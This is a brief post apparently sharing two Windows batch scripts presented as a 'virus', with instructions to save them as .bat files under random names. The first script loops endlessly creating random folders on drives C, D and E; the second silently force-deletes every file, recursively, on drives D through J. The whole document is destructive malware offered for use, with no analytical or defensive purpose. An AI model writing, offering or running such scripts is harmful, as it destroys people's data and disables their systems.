### This code looping throught the C,D,E drives and pop up error codes ##

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################


### This code will delete all the content in all drives except c ###

del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q



$$ Two of these codes has to be save in .bat extension in the text editor and can save with random names. $$


